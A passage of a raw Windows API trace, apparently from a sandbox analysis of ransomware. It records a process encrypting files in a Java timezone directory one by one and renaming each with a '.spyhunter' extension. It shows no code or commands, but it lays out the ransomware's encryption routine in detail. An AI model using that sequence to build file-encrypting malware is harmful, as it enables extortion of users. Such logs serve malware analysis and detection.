pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Inuvik.spyhunter") returned 68 [0170.998] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Inuvik" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\inuvik"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Inuvik.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\inuvik.spyhunter")) returned 1 [0170.999] GetProcessHeap () returned 0x2c0000 [0170.999] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0170.999] GetProcessHeap () returned 0x2c0000 [0170.999] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0170.999] GetProcessHeap () returned 0x2c0000 [0170.999] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb8980 | out: hHeap=0x2c0000) returned 1 [0170.999] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e548 | out: pbBuffer=0x248e548) returned 1 [0170.999] GetProcessHeap () returned 0x2c0000 [0171.000] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0171.000] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e540*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e540*=0x30) returned 1 [0171.000] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Knox" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\knox"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0171.003] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Knox") returned 64 [0171.003] StrStrW (lpFirst="Knox", lpSrch=".txt") returned 0x0 [0171.003] GetProcessHeap () returned 0x2c0000 [0171.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0171.003] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e504, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e504*=0x518, lpOverlapped=0x0) returned 1 [0171.072] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffae8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.072] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x518, lpNumberOfBytesWritten=0x248e504, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e504*=0x518, lpOverlapped=0x0) returned 1 [0171.073] GetProcessHeap () returned 0x2c0000 [0171.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0171.073] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.073] WriteFile (in: hFile=0xb0, lpBuffer=0x248e544*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e504, lpOverlapped=0x0 | out: lpBuffer=0x248e544*, lpNumberOfBytesWritten=0x248e504*=0x4, lpOverlapped=0x0) returned 1 [0171.073] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e504, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e504*=0x30, lpOverlapped=0x0) returned 1 [0171.073] CloseHandle (hObject=0xb0) returned 1 [0171.073] GetProcessHeap () returned 0x2c0000 [0171.073] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.073] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Knox.spyhunter") returned 74 [0171.073] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Knox" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\knox"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Knox.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\knox.spyhunter")) returned 1 [0171.075] GetProcessHeap () returned 0x2c0000 [0171.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.075] GetProcessHeap () returned 0x2c0000 [0171.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0171.075] GetProcessHeap () returned 0x2c0000 [0171.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e04518 | out: hHeap=0x2c0000) returned 1 [0171.075] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e540 | out: pbBuffer=0x248e540) returned 1 [0171.075] GetProcessHeap () returned 0x2c0000 [0171.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0171.075] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e538*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e538*=0x30) returned 1 [0171.075] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Indianapolis" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\indianapolis"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0171.076] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Indianapolis") returned 72 [0171.076] StrStrW (lpFirst="Indianapolis", lpSrch=".txt") returned 0x0 [0171.076] GetProcessHeap () returned 0x2c0000 [0171.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0171.076] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e4fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e4fc*=0x364, lpOverlapped=0x0) returned 1 [0171.123] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffc9c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.123] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x364, lpNumberOfBytesWritten=0x248e4fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e4fc*=0x364, lpOverlapped=0x0) returned 1 [0171.123] GetProcessHeap () returned 0x2c0000 [0171.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0171.124] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.124] WriteFile (in: hFile=0xb0, lpBuffer=0x248e53c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e4fc, lpOverlapped=0x0 | out: lpBuffer=0x248e53c*, lpNumberOfBytesWritten=0x248e4fc*=0x4, lpOverlapped=0x0) returned 1 [0171.124] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e4fc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e4fc*=0x30, lpOverlapped=0x0) returned 1 [0171.124] CloseHandle (hObject=0xb0) returned 1 [0171.124] GetProcessHeap () returned 0x2c0000 [0171.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.124] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Indianapolis.spyhunter") returned 82 [0171.124] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Indianapolis" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\indianapolis"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Indianapolis.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\indianapolis.spyhunter")) returned 1 [0171.125] GetProcessHeap () returned 0x2c0000 [0171.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.126] GetProcessHeap () returned 0x2c0000 [0171.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0171.126] GetProcessHeap () returned 0x2c0000 [0171.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee4fd0 | out: hHeap=0x2c0000) returned 1 [0171.126] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e540 | out: pbBuffer=0x248e540) returned 1 [0171.126] GetProcessHeap () returned 0x2c0000 [0171.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0171.126] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e538*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e538*=0x30) returned 1 [0171.126] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Hermosillo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\hermosillo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0171.127] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Hermosillo") returned 62 [0171.127] StrStrW (lpFirst="Hermosillo", lpSrch=".txt") returned 0x0 [0171.127] GetProcessHeap () returned 0x2c0000 [0171.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0171.127] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e4fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e4fc*=0xbd, lpOverlapped=0x0) returned 1 [0171.128] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffff43, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.128] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xbd, lpNumberOfBytesWritten=0x248e4fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e4fc*=0xbd, lpOverlapped=0x0) returned 1 [0171.128] GetProcessHeap () returned 0x2c0000 [0171.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0171.128] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.129] WriteFile (in: hFile=0xb0, lpBuffer=0x248e53c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e4fc, lpOverlapped=0x0 | out: lpBuffer=0x248e53c*, lpNumberOfBytesWritten=0x248e4fc*=0x4, lpOverlapped=0x0) returned 1 [0171.129] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e4fc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e4fc*=0x30, lpOverlapped=0x0) returned 1 [0171.129] CloseHandle (hObject=0xb0) returned 1 [0171.129] GetProcessHeap () returned 0x2c0000 [0171.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.129] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Hermosillo.spyhunter") returned 72 [0171.129] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Hermosillo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\hermosillo"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Hermosillo.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\hermosillo.spyhunter")) returned 1 [0171.130] GetProcessHeap () returned 0x2c0000 [0171.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.131] GetProcessHeap () returned 0x2c0000 [0171.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0171.131] GetProcessHeap () returned 0x2c0000 [0171.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed45b0 | out: hHeap=0x2c0000) returned 1 [0171.131] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e538 | out: pbBuffer=0x248e538) returned 1 [0171.131] GetProcessHeap () returned 0x2c0000 [0171.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0171.131] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e530*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e530*=0x30) returned 1 [0171.131] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Havana" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\havana"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0171.133] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Havana") returned 58 [0171.133] StrStrW (lpFirst="Havana", lpSrch=".txt") returned 0x0 [0171.133] GetProcessHeap () returned 0x2c0000 [0171.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0171.133] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e4f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e4f4*=0x53c, lpOverlapped=0x0) returned 1 [0171.272] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffac4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.272] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x53c, lpNumberOfBytesWritten=0x248e4f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e4f4*=0x53c, lpOverlapped=0x0) returned 1 [0171.272] GetProcessHeap () returned 0x2c0000 [0171.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0171.272] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.272] WriteFile (in: hFile=0xb0, lpBuffer=0x248e534*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e4f4, lpOverlapped=0x0 | out: lpBuffer=0x248e534*, lpNumberOfBytesWritten=0x248e4f4*=0x4, lpOverlapped=0x0) returned 1 [0171.273] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e4f4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e4f4*=0x30, lpOverlapped=0x0) returned 1 [0171.273] CloseHandle (hObject=0xb0) returned 1 [0171.273] GetProcessHeap () returned 0x2c0000 [0171.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.273] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Havana.spyhunter") returned 68 [0171.273] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Havana" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\havana"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Havana.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\havana.spyhunter")) returned 1 [0171.274] GetProcessHeap () returned 0x2c0000 [0171.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.274] GetProcessHeap () returned 0x2c0000 [0171.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0171.274] GetProcessHeap () returned 0x2c0000 [0171.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb88c0 | out: hHeap=0x2c0000) returned 1 [0171.274] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e538 | out: pbBuffer=0x248e538) returned 1 [0171.274] GetProcessHeap () returned 0x2c0000 [0171.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0171.274] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e530*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e530*=0x30) returned 1 [0171.274] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Godthab" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\godthab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0171.275] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Godthab") returned 59 [0171.275] StrStrW (lpFirst="Godthab", lpSrch=".txt") returned 0x0 [0171.275] GetProcessHeap () returned 0x2c0000 [0171.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0171.275] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e4f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e4f4*=0x40c, lpOverlapped=0x0) returned 1 [0171.349] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffbf4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.349] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x40c, lpNumberOfBytesWritten=0x248e4f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e4f4*=0x40c, lpOverlapped=0x0) returned 1 [0171.349] GetProcessHeap () returned 0x2c0000 [0171.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0171.349] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.349] WriteFile (in: hFile=0xb0, lpBuffer=0x248e534*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e4f4, lpOverlapped=0x0 | out: lpBuffer=0x248e534*, lpNumberOfBytesWritten=0x248e4f4*=0x4, lpOverlapped=0x0) returned 1 [0171.349] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e4f4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e4f4*=0x30, lpOverlapped=0x0) returned 1 [0171.350] CloseHandle (hObject=0xb0) returned 1 [0171.350] GetProcessHeap () returned 0x2c0000 [0171.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.350] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Godthab.spyhunter") returned 69 [0171.350] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Godthab" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\godthab"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Godthab.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\godthab.spyhunter")) returned 1 [0171.351] GetProcessHeap () returned 0x2c0000 [0171.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.351] GetProcessHeap () returned 0x2c0000 [0171.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0171.351] GetProcessHeap () returned 0x2c0000 [0171.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb85c0 | out: hHeap=0x2c0000) returned 1 [0171.351] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e530 | out: pbBuffer=0x248e530) returned 1 [0171.351] GetProcessHeap () returned 0x2c0000 [0171.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0171.352] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e528*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e528*=0x30) returned 1 [0171.352] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Fortaleza" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\fortaleza"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0171.353] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Fortaleza") returned 61 [0171.353] StrStrW (lpFirst="Fortaleza", lpSrch=".txt") returned 0x0 [0171.353] GetProcessHeap () returned 0x2c0000 [0171.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0171.353] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e4ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e4ec*=0x179, lpOverlapped=0x0) returned 1 [0171.354] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffe87, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.354] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x179, lpNumberOfBytesWritten=0x248e4ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e4ec*=0x179, lpOverlapped=0x0) returned 1 [0171.354] GetProcessHeap () returned 0x2c0000 [0171.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0171.354] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.354] WriteFile (in: hFile=0xb0, lpBuffer=0x248e52c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e4ec, lpOverlapped=0x0 | out: lpBuffer=0x248e52c*, lpNumberOfBytesWritten=0x248e4ec*=0x4, lpOverlapped=0x0) returned 1 [0171.354] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e4ec, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e4ec*=0x30, lpOverlapped=0x0) returned 1 [0171.355] CloseHandle (hObject=0xb0) returned 1 [0171.355] GetProcessHeap () returned 0x2c0000 [0171.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.355] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Fortaleza.spyhunter") returned 71 [0171.355] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Fortaleza" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\fortaleza"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Fortaleza.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\fortaleza.spyhunter")) returned 1 [0171.356] GetProcessHeap () returned 0x2c0000 [0171.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.356] GetProcessHeap () returned 0x2c0000 [0171.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0171.356] GetProcessHeap () returned 0x2c0000 [0171.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed4038 | out: hHeap=0x2c0000) returned 1 [0171.356] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e530 | out: pbBuffer=0x248e530) returned 1 [0171.356] GetProcessHeap () returned 0x2c0000 [0171.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0171.356] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e528*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e528*=0x30) returned 1 [0171.357] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\El_Salvador" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\el_salvador"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0171.358] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\El_Salvador") returned 63 [0171.358] StrStrW 